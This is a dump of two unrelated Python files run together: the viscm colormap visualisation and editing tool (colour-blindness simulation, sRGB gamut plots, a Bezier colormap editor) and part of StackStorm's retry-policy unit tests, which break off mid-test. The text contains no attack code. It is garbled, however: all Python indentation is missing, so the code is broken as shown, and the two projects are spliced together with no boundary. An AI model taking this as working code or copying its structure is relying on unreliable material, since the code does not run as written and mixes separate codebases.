_prot50_space = {"name": "sRGB1+CVD",
"cvd_type": "protanomaly",
"severity": 50}
_prot50_to_sRGB1 = cspace_converter(_prot50_space, "sRGB1")
_prot100_space = {"name": "sRGB1+CVD",
"cvd_type": "protanomaly",
"severity": 100}
_prot100_to_sRGB1 = cspace_converter(_prot100_space, "sRGB1")
def _show_cmap(ax, rgb):
ax.imshow(rgb[np.newaxis, ...], aspect="auto")
def _apply_rgb_mat(mat, rgb):
return np.clip(np.einsum("...ij,...j->...i", mat, rgb), 0, 1)
# sRGB corners: a' goes from -37.4 to 45
AP_LIM = (-38, 46)
# b' goes from -46.5 to 42
BP_LIM = (-47, 43)
# J'/K goes from 0 to 100
JP_LIM = (-1, 101)
def _setup_Jpapbp_axis(ax):
ax.set_xlabel("a' (green -> red)")
ax.set_ylabel("b' (blue -> yellow)")
ax.set_zlabel("J'/K (white -> black)")
ax.set_xlim(*AP_LIM)
ax.set_ylim(*BP_LIM)
ax.set_zlim(*JP_LIM)
# Adapt a matplotlib colormap to a linearly transformed version -- useful for
# visualizing how colormaps look given color deficiency.
# Kinda a hack, b/c we inherit from Colormap (this is required), but then
# ignore its implementation entirely.
class TransformedCMap(matplotlib.colors.Colormap):
def __init__(self, transform, base_cmap):
self.transform = transform
self.base_cmap = base_cmap
def __call__(self, *args, **kwargs):
fx = self.base_cmap(*args, **kwargs)
tfx = self.transform(fx)
return tfx
def set_bad(self, *args, **kwargs):
self.base_cmap.set_bad(*args, **kwargs)
def set_under(self, *args, **kwargs):
self.base_cmap.set_under(*args, **kwargs)
def set_over(self, *args, **kwargs):
self.base_cmap.set_over(*args, **kwargs)
def is_gray(self):
return False
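# Illustrative sketch (added example): wrapping a builtin colormap so images
# preview as they would appear under moderate deuteranomaly. The transform
# takes and returns RGBA arrays, mirroring _deuter_transform further below:
#     _sim_cm = TransformedCMap(
#         lambda rgba: np.concatenate(
#             (np.clip(_deuter50_to_sRGB1(rgba[..., :3]), 0, 1), rgba[..., 3:]),
#             axis=-1),
#         plt.get_cmap("jet"))
#     plt.imshow(np.random.rand(8, 8), cmap=_sim_cm)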
def _vis_axes():
grid = GridSpec(10, 4,
left=0.02,
right=0.98,
bottom=0.02,
width_ratios=[1] * 4,
height_ratios=[1] * 10)
axes = {'cmap': grid[0, 0],
'deltas': grid[1:4, 0],
'cmap-greyscale': grid[0, 1],
'lightness-deltas': grid[1:4, 1],
'deuteranomaly': grid[4, 0],
'deuteranopia': grid[5, 0],
'protanomaly': grid[4, 1],
'protanopia': grid[5, 1],
# 'lightness': grid[4:6, 1],
# 'colourfulness': grid[4:6, 2],
# 'hue': grid[4:6, 3],
'image0': grid[0:3, 2],
'image0-cb': grid[0:3, 3],
'image1': grid[3:7, 2],
'image1-cb': grid[3:7, 3],
'image2': grid[7:, 2],
'image2-cb': grid[7:, 3],
}
axes = dict([(key, plt.subplot(value)) for (key, value) in axes.items()])
axes['gamut'] = plt.subplot(grid[6:, :2], projection='3d')
axes['gamut-toggle'] = plt.axes([0.01, 0.01, 0.08, 0.025])
return axes
# N=256 matches the default quantization for LinearSegmentedColormap, which
# reduces quantization/aliasing artifacts (esp. in the perceptual deltas
# plot).
class viscm(object):
def __init__(self, cm, name=None, N=256, N_dots=50, show_gamut=False):
if isinstance(cm, str):
cm = plt.get_cmap(cm)
if name is None:
name = cm.name
self.fig = plt.figure()
self.fig.suptitle("Colormap evaluation: %s" % (name,), fontsize=24)
axes = _vis_axes()
x = np.linspace(0, 1, N)
x_dots = np.linspace(0, 1, N_dots)
RGB = cm(x)[:, :3]
RGB_dots = cm(x_dots)[:, :3]
ax = axes['cmap']
_show_cmap(ax, RGB)
ax.set_title("The colormap in its glory")
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
def label(ax, s):
ax.text(0.95, 0.05, s,
horizontalalignment="right",
verticalalignment="bottom",
transform=ax.transAxes)
Jpapbp = _sRGB1_to_uniform(RGB)
ax = axes['deltas']
local_deltas = N * np.sqrt(np.sum((Jpapbp[:-1, :] - Jpapbp[1:, :]) ** 2, axis=-1))
ax.plot(x[1:], local_deltas)
arclength = np.sum(local_deltas) / N
label(ax, "Perceptual deltas (total: %0.2f)" % (arclength,))
ax.set_ylim(0, ax.get_ylim()[1])
ax.get_xaxis().set_visible(False)
ax = axes['cmap-greyscale']
_show_cmap(ax, to_greyscale(RGB))
ax.set_title("Black-and-white printed")
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
ax = axes['lightness-deltas']
ax.axhline(0, linestyle="--", color="grey")
lightness_deltas = N * np.diff(Jpapbp[:, 0])
ax.plot(x[1:], lightness_deltas)
label(ax,
"Perceptual lightness deltas (total: %0.2f)"
% (np.sum(np.abs(lightness_deltas)) / N,))
#ax.set_ylim(0, ax.get_ylim()[1])
ax.get_xaxis().set_visible(False)
# ax = axes['lightness']
# ax.plot(x, ciecam02.J)
# label(ax, "Lightness (J)")
# ax.set_ylim(0, 105)
# ax = axes['colourfulness']
# ax.plot(x, ciecam02.M)
# label(ax, "Colourfulness (M)")
# ax = axes['hue']
# ax.plot(x, ciecam02.h)
# label(ax, "Hue angle (h)")
# ax.set_ylim(0, 360)
def anom(ax, converter, name):
_show_cmap(ax, np.clip(converter(RGB), 0, 1))
label(ax, name)
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
anom(axes['deuteranomaly'],
_deuter50_to_sRGB1,
"Moderate deuteranomaly")
anom(axes['deuteranopia'],
_deuter100_to_sRGB1,
"Complete deuteranopia")
anom(axes['protanomaly'],
_prot50_to_sRGB1,
"Moderate protanomaly")
anom(axes['protanopia'],
_prot100_to_sRGB1,
"Complete protanopia")
ax = axes['gamut']
ax.plot(Jpapbp[:, 1], Jpapbp[:, 2], Jpapbp[:, 0])
Jpapbp_dots = _sRGB1_to_uniform(RGB_dots)
ax.scatter(Jpapbp_dots[:, 1],
Jpapbp_dots[:, 2],
Jpapbp_dots[:, 0],
c=RGB_dots[:, :],
s=80)
# Draw a wireframe indicating the sRGB gamut
self.gamut_patch = sRGB_gamut_patch()
# That function returns a patch where each face is colored to match
# the represented colors. For present purposes we want something
# less... colorful.
self.gamut_patch.set_facecolor([0.5, 0.5, 0.5, 0.1])
self.gamut_patch.set_edgecolor([0.2, 0.2, 0.2, 0.1])
ax.add_collection3d(self.gamut_patch)
self.gamut_patch.set_visible(show_gamut)
ax.view_init(elev=75, azim=-75)
self.gamut_patch_toggle = Button(axes['gamut-toggle'], "Toggle gamut")
def toggle(*args):
self.gamut_patch.set_visible(not self.gamut_patch.get_visible())
plt.draw()
self.gamut_patch_toggle.on_clicked(toggle)
_setup_Jpapbp_axis(ax)
images = []
image_args = []
example_dir = os.path.join(os.path.dirname(__file__), "examples")
images.append(np.loadtxt(os.path.join(example_dir, "hist2d.txt")))
image_args.append({"aspect": "equal",
"origin": "lower",
"interpolation": "nearest",
"vmin": 0})
images.append(np.loadtxt(os.path.join(example_dir,
"st-helens_before-modified.txt.gz")).T)
image_args.append({})
# Adapted from http://matplotlib.org/mpl_examples/images_contours_and_fields/pcolormesh_levels.py
dx = dy = 0.05
y, x = np.mgrid[-5 : 5 + dy : dy, -5 : 10 + dx : dx]
z = np.sin(x) ** 10 + np.cos(10 + y * x) + np.cos(x) + 0.2 * y + 0.1 * x
images.append(z)
image_args.append({})
def _deuter_transform(RGBA):
# clipping, alpha handling
RGB = RGBA[..., :3]
RGB = np.clip(_deuter50_to_sRGB1(RGB), 0, 1)
return np.concatenate((RGB, RGBA[..., 3:]), axis=-1)
deuter_cm = TransformedCMap(_deuter_transform, cm)
for i, (image, args) in enumerate(zip(images, image_args)):
ax = axes['image%i' % (i,)]
ax.imshow(image, cmap=cm, **args)
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
ax_cb = axes['image%i-cb' % (i,)]
ax_cb.imshow(image, cmap=deuter_cm, **args)
ax_cb.get_xaxis().set_visible(False)
ax_cb.get_yaxis().set_visible(False)
axes['image0'].set_title("Sample images")
axes['image0-cb'].set_title("Moderate deuter.")
def sRGB_gamut_patch(resolution=20):
step = 1.0 / resolution
sRGB_quads = []
sRGB_values = []
# each entry in 'quads' is a 4x3 array where each row contains the
# coordinates of a corner point
for fixed in 0, 1:
for i in range(resolution):
for j in range(resolution):
# R quad
sRGB_quads.append([[fixed, i * step, j * step],
[fixed, (i+1) * step, j * step],
[fixed, (i+1) * step, (j+1) * step],
[fixed, i * step, (j+1) * step]])
sRGB_values.append((fixed, (i + 0.5) * step, (j + 0.5) * step,
1))
# G quad
sRGB_quads.append([[i * step, fixed, j * step],
[(i+1) * step, fixed, j * step],
[(i+1) * step, fixed, (j+1) * step],
[i * step, fixed, (j+1) * step]])
sRGB_values.append(((i + 0.5) * step, fixed, (j + 0.5) * step,
1))
# B quad
sRGB_quads.append([[i * step, j * step, fixed],
[(i+1) * step, j * step, fixed],
[(i+1) * step, (j+1) * step, fixed],
[i * step, (j+1) * step, fixed]])
sRGB_values.append(((i + 0.5) * step, (j + 0.5) * step, fixed,
1))
sRGB_quads = np.asarray(sRGB_quads)
# work around colorspace transform bugginess in handling high-dim
# arrays
sRGB_quads_2d = sRGB_quads.reshape((-1, 3))
Jpapbp_quads_2d = _sRGB1_to_uniform(sRGB_quads_2d)
Jpapbp_quads = Jpapbp_quads_2d.reshape((-1, 4, 3))
gamut_patch = mpl_toolkits.mplot3d.art3d.Poly3DCollection(
Jpapbp_quads[:, :, [1, 2, 0]])
gamut_patch.set_facecolor(sRGB_values)
gamut_patch.set_edgecolor(sRGB_values)
return gamut_patch
def sRGB_gamut_Jp_slice(Jp,
ap_lim=(-50, 50), bp_lim=(-50, 50), resolution=200):
bp_grid, ap_grid = np.mgrid[bp_lim[0] : bp_lim[1] : resolution * 1j,
ap_lim[0] : ap_lim[1] : resolution * 1j]
Jp_grid = Jp * np.ones((resolution, resolution))
Jpapbp = np.concatenate((Jp_grid[:, :, np.newaxis],
ap_grid[:, :, np.newaxis],
bp_grid[:, :, np.newaxis]),
axis=2)
sRGB = _uniform_to_sRGB1(Jpapbp)
sRGBA = np.concatenate((sRGB, np.ones(sRGB.shape[:2] + (1,))),
axis=2)
sRGBA[np.any((sRGB < 0) | (sRGB > 1), axis=-1)] = [0, 0, 0, 0]
return sRGBA
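# Illustrative sketch (added example): view the in-gamut slice at mid
# lightness; out-of-gamut pixels come back fully transparent in the RGBA:
#     plt.imshow(sRGB_gamut_Jp_slice(50), extent=(-50, 50, -50, 50),
#                origin="lower", aspect="equal")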
def draw_pure_hue_angles(ax):
# Pure hue angles from CIECAM-02
for color, angle in [("r", 20.14),
("y", 90.00),
("g", 164.25),
("b", 237.53)]:
x = np.cos(np.deg2rad(angle))
y = np.sin(np.deg2rad(angle))
ax.plot([0, x * 1000], [0, y * 1000], color + "--")
def draw_sRGB_gamut_Jp_slice(ax, Jp, ap_lim=(-50, 50), bp_lim=(-50, 50),
**kwargs):
sRGB = sRGB_gamut_Jp_slice(Jp, ap_lim=ap_lim, bp_lim=bp_lim, **kwargs)
im = ax.imshow(sRGB, aspect="equal",
extent=ap_lim + bp_lim, origin="lower")
draw_pure_hue_angles(ax)
ax.set_xlim(ap_lim)
ax.set_ylim(bp_lim)
return im
# def sRGB_gamut_J_slice(J,
# ap_lim=(-50, 50), bp_lim=(-50, 50), resolution=200):
# a_grid, b_grid = np.mgrid[ap_lim[0] : ap_lim[1] : resolution * 1j,
# bp_lim[0] : bp_lim[1] : resolution * 1j]
# J_grid = J * np.ones((resolution, resolution))
# h = np.rad2deg(np.arctan2(b_grid, a_grid))
# M = np.hypot(a_grid, b_grid)
# XYZ = ViewingConditions.sRGB.CIECAM02_to_XYZ(J=J_grid, M=M, h=h)
# sRGB = XYZ_to_sRGB(XYZ)
# sRGB[np.any((sRGB < 0) | (sRGB > 1), axis=-1)] = np.nan
# return sRGB
def _viscm_editor_axes():
grid = GridSpec(1, 2,
width_ratios=[5, 1],
height_ratios=[6, 1])
axes = {'bezier': grid[0, 0],
'cm': grid[0, 1]}
axes = dict([(key, plt.subplot(value)) for (key, value) in axes.items()])
return axes
class viscm_editor(object):
def __init__(self, min_Jp=15, max_Jp=95, xp=None, yp=None):
from .bezierbuilder import BezierModel, BezierBuilder
axes = _viscm_editor_axes()
ax_btn_wireframe = plt.axes([0.7, 0.15, 0.1, 0.025])
self.btn_wireframe = Button(ax_btn_wireframe, 'Show 3D gamut')
self.btn_wireframe.on_clicked(self.plot_3d_gamut)
ax_btn_wireframe = plt.axes([0.81, 0.15, 0.1, 0.025])
self.btn_save = Button(ax_btn_wireframe, 'Save colormap')
self.btn_save.on_clicked(self.save_colormap)
ax_btn_props = plt.axes([0.81, 0.1, 0.1, 0.025])
self.btn_props = Button(ax_btn_props, 'Properties')
self.btn_props.on_clicked(self.show_viscm)
self.prop_windows = []
axcolor = 'None'
ax_jp_min = plt.axes([0.1, 0.1, 0.5, 0.03], axisbg=axcolor)
ax_jp_min.imshow(np.linspace(0, 100, 101).reshape(1, -1), cmap='gray')
ax_jp_min.set_xlim(0, 100)
ax_jp_max = plt.axes([0.1, 0.15, 0.5, 0.03], axisbg=axcolor)
ax_jp_max.imshow(np.linspace(0, 100, 101).reshape(1, -1), cmap='gray')
self.jp_min_slider = Slider(ax_jp_min, r"$J'_\mathrm{min}$", 0, 100, valinit=min_Jp)
self.jp_max_slider = Slider(ax_jp_max, r"$J'_\mathrm{max}$", 0, 100, valinit=max_Jp)
self.jp_min_slider.on_changed(self._jp_update)
self.jp_max_slider.on_changed(self._jp_update)
# This is my favorite set of control points so far (just from playing
# around with things):
# min_Jp = 15
# max_Jp = 95
# xp =
# [-4, 27.041103603603631, 84.311067635550557, 12.567076579094476, -9.6]
# yp =
# [-34, -41.447876447876524, 36.28563443264386, 25.357741755170423, 41]
# -- njs, 2015-04-05
if xp is None:
xp = [-4, 38.289146128951984, 52.1923711457504,
39.050944362271053, 18.60872492130315, -9.6]
if yp is None:
yp = [-34, -34.34528254916614, -21.594701710471412,
31.701084689194829, 29.510846891948262, 41]
self.bezier_model = BezierModel(xp, yp)
self.cmap_model = BezierCMapModel(self.bezier_model,
self.jp_min_slider.val,
self.jp_max_slider.val)
self.highlight_point_model = HighlightPointModel(self.cmap_model, 0.5)
self.bezier_builder = BezierBuilder(axes['bezier'], self.bezier_model)
self.bezier_gamut_viewer = GamutViewer2D(axes['bezier'],
self.highlight_point_model)
tmp = HighlightPoint2DView(axes['bezier'],
self.highlight_point_model)
self.bezier_highlight_point_view = tmp
#draw_pure_hue_angles(axes['bezier'])
axes['bezier'].set_xlim(-100, 100)
axes['bezier'].set_ylim(-100, 100)
self.cmap_view = CMapView(axes['cm'], self.cmap_model)
self.cmap_highlighter = HighlightPointBuilder(
axes['cm'],
self.highlight_point_model)
print("Click sliders at bottom to change min/max lightness")
print("Click on colorbar to adjust gamut view")
print("Click-drag to move control points, ")
print(" shift-click to add, control-click to delete")
def plot_3d_gamut(self, event):
fig, ax = plt.subplots(subplot_kw=dict(projection='3d'))
self.wireframe_view = WireframeView(ax,
self.cmap_model,
self.highlight_point_model)
plt.show()
def save_colormap(self, event):
import textwrap
template = textwrap.dedent('''
from matplotlib.colors import LinearSegmentedColormap
from numpy import nan, inf
# Used to reconstruct the colormap in pycam02ucs.cm.viscm
parameters = {{'xp': {xp},
'yp': {yp},
'min_Jp': {min_Jp},
'max_Jp': {max_Jp}}}
cm_data = {array_list}
test_cm = LinearSegmentedColormap.from_list(__file__, cm_data)
if __name__ == "__main__":
import matplotlib.pyplot as plt
import numpy as np
try:
from pycam02ucs.cm.viscm import viscm
viscm(test_cm)
except ImportError:
print("pycam02ucs not found, falling back on simple display")
plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto',
cmap=test_cm)
plt.show()
''')
rgb, _ = self.cmap_model.get_sRGB(num=256)
with open('/tmp/new_cm.py', 'w') as f:
array_list = np.array_repr(rgb, max_line_width=78)
array_list = array_list.replace('array(', '')[:-1]
xp, yp = self.cmap_model.bezier_model.get_control_points()
data = dict(array_list=array_list,
xp=xp,
yp=yp,
min_Jp=self.cmap_model.min_Jp,
max_Jp=self.cmap_model.max_Jp)
f.write(template.format(**data))
print("*" * 50)
print("Saved colormap to /tmp/new_cm.py")
print("*" * 50)
def show_viscm(self, event):
cm = LinearSegmentedColormap.from_list(
'test_cm',
self.cmap_model.get_sRGB(num=256)[0])
self.prop_windows.append(viscm(cm, name='test_cm'))
plt.show()
def _jp_update(self, val):
jp_min = self.jp_min_slider.val
jp_max = self.jp_max_slider.val
smallest, largest = min(jp_min, jp_max), max(jp_min, jp_max)
if (jp_min > smallest) or (jp_max < largest):
self.jp_min_slider.set_val(smallest)
self.jp_max_slider.set_val(largest)
self.cmap_model.set_Jp_minmax(smallest, largest)
class BezierCMapModel(object):
def __init__(self, bezier_model, min_Jp, max_Jp):
self.bezier_model = bezier_model
self.min_Jp = min_Jp
self.max_Jp = max_Jp
self.trigger = Trigger()
self.bezier_model.trigger.add_callback(self.trigger.fire)
def set_Jp_minmax(self, min_Jp, max_Jp):
self.min_Jp = min_Jp
self.max_Jp = max_Jp
self.trigger.fire()
def get_Jpapbp_at(self, at):
ap, bp = self.bezier_model.get_bezier_points_at(at)
Jp = (self.max_Jp - self.min_Jp) * at + self.min_Jp
return Jp, ap, bp
def get_Jpapbp(self, num=200):
return self.get_Jpapbp_at(np.linspace(0, 1, num))
def get_sRGB(self, num=200):
# Return sRGB and out-of-gamut mask
Jp, ap, bp = self.get_Jpapbp(num=num)
sRGB = _uniform_to_sRGB1(np.column_stack((Jp, ap, bp)))
oog = np.any((sRGB > 1) | (sRGB < 0), axis=-1)
sRGB[oog, :] = np.nan
return sRGB, oog
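# Illustrative sketch (added example): the model can be driven outside the
# editor; BezierModel takes parallel xp/yp control-point lists, as in
# viscm_editor above. Out-of-gamut samples come back as NaN rows:
#     from .bezierbuilder import BezierModel
#     model = BezierCMapModel(BezierModel([-4, 0, 10], [-34, 0, 41]), 15, 95)
#     srgb, oog = model.get_sRGB(num=64)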
class CMapView(object):
def __init__(self, ax, cmap_model):
self.ax = ax
self.cmap_model = cmap_model
rgb_display, oog_display = self._drawable_arrays()
self.image = self.ax.imshow(rgb_display, extent=(0, 0.2, 0, 1),
origin="lower")
self.gamut_alert_image = self.ax.imshow(oog_display,
extent=(0.05, 0.15, 0, 1),
origin="lower")
self.ax.set_xlim(0, 0.2)
self.ax.set_ylim(0, 1)
self.ax.get_xaxis().set_visible(False)
self.cmap_model.trigger.add_callback(self._refresh)
def _drawable_arrays(self):
rgb, oog = self.cmap_model.get_sRGB()
rgb_display = rgb[:, np.newaxis, :]
oog_display = np.empty((rgb.shape[0], 1, 4))
oog_display[...] = [0, 0, 0, 0]
oog_display[oog, :, :] = [0, 1, 1, 1]
return rgb_display, oog_display
def _refresh(self):
rgb_display, oog_display = self._drawable_arrays()
self.image.set_data(rgb_display)
self.gamut_alert_image.set_data(oog_display)
class HighlightPointModel(object):
def __init__(self, cmap_model, point):
self._cmap_model = cmap_model
self._point = point
self.trigger = Trigger()
self._cmap_model.trigger.add_callback(self.trigger.fire)
def get_point(self):
return self._point
def set_point(self, point):
self._point = point
self.trigger.fire()
def get_Jpapbp(self):
return self._cmap_model.get_Jpapbp_at(self._point)
class HighlightPointBuilder(object):
def __init__(self, ax, highlight_point_model):
self.ax = ax
self.highlight_point_model = highlight_point_model
self.canvas = self.ax.figure.canvas
self._in_drag = False
self.canvas.mpl_connect("button_press_event", self._on_button_press)
self.canvas.mpl_connect("motion_notify_event", self._on_motion)
self.canvas.mpl_connect("button_release_event",
self._on_button_release)
self.marker_line = self.ax.axhline(highlight_point_model.get_point(),
linewidth=3, color="r")
self.highlight_point_model.trigger.add_callback(self._refresh)
def _on_button_press(self, event):
if event.inaxes != self.ax:
return
if event.button != 1:
return
self._in_drag = True
self.highlight_point_model.set_point(event.ydata)
def _on_motion(self, event):
if self._in_drag and event.ydata is not None:
self.highlight_point_model.set_point(event.ydata)
def _on_button_release(self, event):
if event.button != 1:
return
self._in_drag = False
def _refresh(self):
point = self.highlight_point_model.get_point()
self.marker_line.set_data([0, 1], [point, point])
self.canvas.draw()
class GamutViewer2D(object):
def __init__(self, ax, highlight_point_model,
ap_lim=(-50, 50), bp_lim=(-50, 50)):
self.ax = ax
self.highlight_point_model = highlight_point_model
self.ap_lim = ap_lim
self.bp_lim = bp_lim
self.bgcolors = {"light": (0.9, 0.9, 0.9),
"dark": (0.1, 0.1, 0.1)}
# We want some hysteresis, so that there's no point where wiggling the
# line back and forth causes background flickering.
self.bgcolor_ranges = {"light": (0, 60), "dark": (40, 100)}
self.bg_opposites = {"light": "dark", "dark": "light"}
self.bg = "light"
self.ax.set_axis_bgcolor(self.bgcolors[self.bg])
self.image = self.ax.imshow([[[0, 0, 0]]], aspect="equal",
extent=ap_lim + bp_lim,
origin="lower")
self.highlight_point_model.trigger.add_callback(self._refresh)
def _refresh(self):
Jp, _, _ = self.highlight_point_model.get_Jpapbp()
low, high = self.bgcolor_ranges[self.bg]
if not (low <= Jp <= high):
self.bg = self.bg_opposites[self.bg]
self.ax.set_axis_bgcolor(self.bgcolors[self.bg])
sRGB = sRGB_gamut_Jp_slice(Jp, self.ap_lim, self.bp_lim)
self.image.set_data(sRGB)
class HighlightPoint2DView(object):
def __init__(self, ax, highlight_point_model):
self.ax = ax
self.highlight_point_model = highlight_point_model
_, ap, bp = self.highlight_point_model.get_Jpapbp()
self.marker = self.ax.plot([ap], [bp], "y.", mew=3)[0]
self.highlight_point_model.trigger.add_callback(self._refresh)
def _refresh(self):
_, ap, bp = self.highlight_point_model.get_Jpapbp()
self.marker.set_data([ap], [bp])
self.ax.figure.canvas.draw()
class WireframeView(object):
def __init__(self, ax, cmap_model, highlight_point_model):
self.ax = ax
self.cmap_model = cmap_model
self.highlight_point_model = highlight_point_model
Jp, ap, bp = self.cmap_model.get_Jpapbp()
self.line = self.ax.plot([0, 10], [0, 10])[0]
#self.line = self.ax.plot(Jp, ap, bp)[0]
Jp, ap, bp = self.highlight_point_model.get_Jpapbp()
self.marker = self.ax.plot([Jp], [ap], [bp], "y.", mew=3)[0]
gamut_patch = sRGB_gamut_patch()
# That function returns a patch where each face is colored to match
# the represented colors. For present purposes we want something
# less... colorful.
gamut_patch.set_facecolor([0.5, 0.5, 0.5, 0.1])
gamut_patch.set_edgecolor([0.2, 0.2, 0.2, 0.1])
self.ax.add_collection3d(gamut_patch)
_setup_Jpapbp_axis(self.ax)
#self.cmap_model.trigger.add_callback(self._refresh_line)
#self.highlight_point_model.trigger.add_callback(self._refresh_point)
self._refresh_line()
self._refresh_point()
def _refresh_line(self):
Jp, ap, bp = self.cmap_model.get_Jpapbp()
self.line.set_data(ap, bp)
self.line.set_3d_properties(zs=Jp)
self.ax.figure.canvas.draw()
def _refresh_point(self):
Jp, ap, bp = self.highlight_point_model.get_Jpapbp()
self.marker.set_data([ap], [bp])
self.marker.set_3d_properties(zs=[Jp])
self.ax.figure.canvas.draw()
def main(argv):
import argparse
# Usage:
# python -m viscm
# python -m viscm edit
# python -m viscm edit <file.py>
# (file.py must define some appropriate globals)
# python -m viscm view <file.py>
# (file.py must define a global named "test_cm")
# python -m viscm view "matplotlib builtin colormap"
# python -m viscm view --save=foo.png ...
parser = argparse.ArgumentParser(
prog="python -m viscm",
description="A colormap tool.",
)
parser.add_argument("action", metavar="ACTION",
help="'edit' or 'view'",
choices=["edit", "view", "show"],
default="edit",
nargs="?")
parser.add_argument("colormap", metavar="COLORMAP",
default=None,
help="A .py file saved from the editor, or "
"the name of a matplotlib builtin colormap",
nargs="?")
parser.add_argument("--save", metavar="FILE",
default=None,
help="Immediately save visualization to a file (view-mode only).")
parser.add_argument("--quit", default=False, action="store_true",
help="Quit immediately after starting (useful with --save).")
args = parser.parse_args(argv)
params = {}
cmap = None
if args.colormap:
if os.path.isfile(args.colormap):
ns = {'__name__': '',
'__file__': os.path.basename(args.colormap),
}
with open(args.colormap) as f:
code = compile(f.read(),
os.path.basename(args.colormap),
'exec')
exec(code, globals(), ns)
params = ns.get('parameters', {})
if "min_JK" in params:
params["min_Jp"] = params.pop("min_JK")
params["max_Jp"] = params.pop("max_JK")
cmap = ns.get("test_cm", None)
else:
cmap = plt.get_cmap(args.colormap)
# Easter egg! I keep typing 'show' instead of 'view' so accept both
if args.action in ("view", "show"):
if cmap is None:
sys.exit("Please specify a colormap")
v = viscm(cmap)
if args.save is not None:
v.fig.set_size_inches(20, 12)
v.fig.savefig(args.save)
elif args.action == "edit":
if params is None:
sys.exit("Sorry, I don't know how to edit the specified colormap")
# Hold a reference so it doesn't get GC'ed
v = viscm_editor(**params)
else:
raise RuntimeError("can't happen")
if args.quit:
sys.exit()
plt.show()
if __name__ == "__main__":
main(sys.argv[1:])
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import st2actions
from st2common.constants.action import LIVEACTION_STATUS_REQUESTED
from st2common.constants.action import LIVEACTION_STATUS_SUCCEEDED
from st2common.constants.action import LIVEACTION_STATUS_TIMED_OUT
from st2common.bootstrap.policiesregistrar import register_policy_types
from st2common.models.db.action import LiveActionDB
from st2common.persistence.action import LiveAction, ActionExecution
from st2common.services import action as action_service
from st2actions.policies.retry import ExecutionRetryPolicyApplicator
from st2tests.base import DbTestCase
from st2tests.base import CleanDbTestCase
from st2tests.fixturesloader import FixturesLoader
PACK = 'generic'
TEST_FIXTURES = {
'runners': [
'testrunner1.yaml'
],
'actions': [
'action1.yaml'
],
'policies': [
'policy_4.yaml'
]
}
class RetryPolicyTestCase(CleanDbTestCase):
@classmethod
def setUpClass(cls):
DbTestCase.setUpClass()
super(RetryPolicyTestCase, cls).setUpClass()
def setUp(self):
super(RetryPolicyTestCase, self).setUp()
# Register common policy types
register_policy_types(st2actions)
loader = FixturesLoader()
models = loader.save_fixtures_to_db(fixtures_pack=PACK,
fixtures_dict=TEST_FIXTURES)
# Instantiate policy applicator we will use in the tests
policy_db = models['policies']['policy_4.yaml']
retry_on = policy_db.parameters['retry_on']
max_retry_count = policy_db.parameters['max_retry_count']
self.policy = ExecutionRetryPolicyApplicator(policy_ref='test_policy',
policy_type='action.retry',
retry_on=retry_on,
max_retry_count=max_retry_count,
delay=0)
def test_retry_on_timeout_no_retry_since_no_timeout_reached(self):
# Verify initial state
self.assertSequenceEqual(LiveAction.get_all(), [])
self.assertSequenceEqual(ActionExecution.get_all(), [])
# Start a mock action which succeeds
liveaction = LiveActionDB(action='wolfpack.action-1', parameters={'actionstr': 'foo'})
live_action_db, execution_db = action_service.request(liveaction)
live_action_db.status = LIVEACTION_STATUS_SUCCEEDED
execution_db.status = LIVEACTION_STATUS_SUCCEEDED
LiveAction.add_or_update(live_action_db)
ActionExecution.add_or_update(execution_db)
# Simulate policy "apply_after" run
self.policy.apply_after(target=live_action_db)
# There should only be 1 object since the action didn't time out and therefore it wasn't
# retried
live_action_dbs = LiveAction.get_all()
action_execution_dbs = ActionExecution.get_all()
self.assertEqual(len(live_action_dbs), 1)
self.assertEqual(len(action_execution_dbs), 1)
self.assertEqual(action_execution_dbs[0].status, LIVEACTION_STATUS_SUCCEEDED)
def test_retry_on_timeout_first_retry_is_successful(self):
# Verify initial state
self.assertSequenceEqual(LiveAction.get_all(), [])
self.assertSequenceEqual(ActionExecution.get_all(), [])
# Start a mock action which times out
liveaction = LiveActionDB(action='wolfpack.action-1', parameters={'actionstr': 'foo'})
live_action_db, execution_db = action_service.request(liveaction)
live_action_db.status = LIVEACTION_STATUS_TIMED_OUT
execution_db.status = LIVEACTION_STATUS_TIMED_OUT
LiveAction.add_or_update(live_action_db)
ActionExecution.add_or_update(execution_db)
# Simulate policy "apply_after" run
self.policy.apply_after(target=live_action_db)
# There should be two objects - original execution and retried execution
live_action_dbs = LiveAction.get_all()
action_execution_dbs = ActionExecution.get_all()
self.assertEqual(len(live_action_dbs), 2)
self.assertEqual(len(action_execution_dbs), 2)
self.assertEqual(action_execution_dbs[0].status, LIVEACTION_STATUS_TIMED_OUT)
self.assertEqual(action_execution_dbs[1].status, LIVEACTION_STATUS_REQUESTED)
# Simulate success of the second action so it shouldn't be retried anymore
live_action_db = live_action_dbs[1]
live_action_db.status = LIVEACTION_STATUS_SUCCEEDED
LiveAction.add_or_update(live_action_db)
# Simulate policy "apply_after" run
self.policy.apply_after(target=live_action_db)
# There should be no new object since action succeeds so no retry was attempted
live_action_dbs = LiveAction.get_all()
action_execution_dbs = ActionExecution.get_all()
self.assertEqual(len(live_action_dbs), 2)
self.assertEqual(len(action_execution_dbs), 2)
self.assertEqual(live_action_dbs[0].status, LIVEACTION_STATUS_TIMED_OUT)
self.assertEqual(live_action_dbs[1].status, LIVEACTION_STATUS_SUCCEEDED)
def test_retry_on_timeout_max_retries_reached(self):
# Verify initial state
self.assertSequenceEqual(LiveAction.get_all(), [])
self.assertSequenceEqual(ActionExecution.get_all(), [])
# Start a mock action which times out
liveaction = LiveActionDB(action='wolfpack.action-1', parameters={'actionstr': 'foo'})
live_action_db, execution_db = action_service.request(liveaction)
live_action_db.status = LIVEACTION_STATUS_TIMED_OUT
live_action_db.context['policies'] = {}
live_action_db.context['policies']['retry'] = {'retry_count': 2}
execution_db.status = LIVEACTION_STATUS_TIMED_OUT
